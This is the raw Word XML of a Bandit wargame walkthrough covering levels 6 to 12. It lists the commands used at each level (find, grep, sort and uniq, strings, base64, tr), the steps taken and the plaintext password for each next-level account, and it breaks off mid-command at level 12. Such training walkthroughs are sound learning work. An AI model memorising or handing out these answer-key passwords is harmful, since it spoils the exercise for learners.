    <w:p w14:paraId="1CC5527B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="58F9F48D" w14:textId="063381A4" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Combine multiple find conditions using size, type, and permission flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0827A416" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F53700" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="56BCF71C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2A60D480" w14:textId="7941A2BF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6 → Level 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC4F87B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="227D798D" w14:textId="229A8CBA" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ACDB28" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7C606B90" w14:textId="3AB6157A" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Find file owned by bandit7:bandit6 with size 33 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0B71F2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="441F037E" w14:textId="457CE253" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `find / -user bandit7 -group bandit6 -size 33c 2&gt;/dev/null`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D5C38D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="47BBDCB4" w14:textId="141FD8F3" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0EAF33" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Searched entire filesystem from root with ownership and size criteria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0763E7C9" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Suppressed permission errors with `2&gt;/dev/null`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBFBC99" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Found file at `/var/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dpkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/info/bandit7.password`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB3045C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3ABB21E7" w14:textId="3DB69F90" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381064A6" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F203F4" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: morbNTDkSW6jIlUc0ymOdMaLnOlFVAaj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8E84B4" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5885B7CB" w14:textId="79920F26" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Search files by ownership and redirect errors to suppress permission denials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE8CEC0" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB00A9E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="66A8ADFB" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="702764DA" w14:textId="660D60F0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7 → Level 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3254E3E6" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7DB7CD30" w14:textId="3212C351" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: grep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F479417" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4808EE54" w14:textId="50D84176" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Find password next to word "millionth" in data.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ABDA4B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="70E2378D" w14:textId="1DAD68A3" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `grep millionth data.txt`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317A00ED" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="308262BC" w14:textId="66275667" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15128996" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Used `grep` to search for specific keyword in large file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0334F751" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Found password on the same line as "millionth"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22009E44" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0CC46742" w14:textId="10CD3E11" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B9FD35" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B33B6DE" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: dfwvzFQi4mU0wfNbFOe9RoWskMLg7eEc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FB299A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3377F9AC" w14:textId="2C09B3F2" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Use grep to quickly search for patterns in large text files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB217B9" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DAB7E95" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="647CC45D" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="281FCE8B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="674384C8" w14:textId="2A4CB23A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8 → Level 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2449E824" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="425B6DBE" w14:textId="0EE8DF3D" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Tools Used: sort, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="488DE27F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0636FF20" w14:textId="33642648" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Find the only unique line in data.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E63210" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="481B5592" w14:textId="19B3896A" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Commands Used: `sort data.txt | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE9FFF" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="553CF14C" w14:textId="2469803D" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E01CD86" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Sorted the file contents alphabetically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46364A26" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Used `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u` to find lines that appear only once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC75DAF" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Found the unique password line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A61E02A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="37E159B7" w14:textId="2B67CD79" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3B8CA2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168F03D0" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: 4CKMh1JI91bUIZZPXDqGanal4xvAg0JM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0791F7B1" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="05D7EC77" w14:textId="36B01CFE" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Learning: Combine sort and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> commands to find unique entries in text files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47973652" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49EB9BE9" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="31FCF423" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="508EB4FB" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0DC1D435" w14:textId="5B5E2925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9 → Level 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF6B29E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="162F4E8A" w14:textId="61F98254" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE4B044" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="734AFA04" w14:textId="5DCD0935" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Find human-readable strings in binary data file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E665913" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5773FDDA" w14:textId="4563EEC0" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `strings data.txt`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DE66C5" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4A194D7C" w14:textId="7CDF7E51" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BE778C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Used `strings` to extract printable characters from binary file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FD061B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Located password among the readable strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E02841" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7375158F" w14:textId="385B00E1" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC907E2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54404989" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: FGUW5ilLVJrxX9kMYMmlN4MgbpfMiqey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4151DDEB" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7CBB4F58" w14:textId="51A51C58" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Extract readable text from binary files using the strings command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DFCE0B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34AF5A31" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="289BA120" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="75811C2B" w14:textId="465D549F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10 → Level 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75228BC3" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4958B8A4" w14:textId="366E2A8D" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB04EB5" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="65C85B81" w14:textId="68BA4587" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Decode Base64 encoded data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526B577A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7B07C792" w14:textId="1A61B502" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `base64 -d data.txt`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74802D96" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7461D5F1" w14:textId="425F0B77" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68596187" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Identified Base64 encoded content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FF764C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Used `base64 -d` to decode the content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A1DEC" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Retrieved the decoded password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380AB82F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0E48A790" w14:textId="0188C7B9" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1450F38A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009BBFC4" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: dtR173fZKb0RRsDFSGsg2RWnpNVj3qRr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72187261" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2EE8EB93" w14:textId="1F087EF3" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Recognize and decode Base64 encoded data using base64 command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A240D7" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C94DE0B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="66ECF108" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="29056E6F" w14:textId="05842BFC" w:rsidR="00B305D3" w:rsidRPr="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs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11 → Level 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506A6E44" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="1E150DA8" w14:textId="6FA63F3E" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: tr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B9AF8A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="768FFBE0" w14:textId="257F2A64" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Decode ROT13 cipher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBEA9CD" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0984E6D5" w14:textId="3DB727D7" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `cat data.txt | tr 'A-Za-z' 'N-ZA-Mn-za-m'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A982630" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="49FDCABD" w14:textId="6D47E8C5" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2857A38E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Identified ROT13 encoded text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452A51D5" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Used `tr` to translate characters with ROT13 mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03922AA7" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Decoded the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197B0D15" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="20B18BE3" w14:textId="426E8F0A" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56505237" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626EDE25" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: 7x16WNeHIi5YkIhWsfFIqoognUTyj9Q4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524D2D4C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="75CFA01C" w14:textId="08D89C0C" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Use tr command for character translation and ROT13 decoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393E5AC4" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E1626D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5F054DDF" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="69895813" w14:textId="3A981C51" w:rsidR="00B305D3" w:rsidRPr="00B305D3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B305D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Level 12 → Level 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5504B89A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="312AD4C5" w14:textId="59442E7F" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Tools Used: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, bzip2, tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533167D3" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2968F6D3" w14:textId="723A8601" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Extract password from repeatedly compressed hex dump.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD1C914" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="1D1BE899" w14:textId="3E88F1CA" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Commands Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B6F160" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
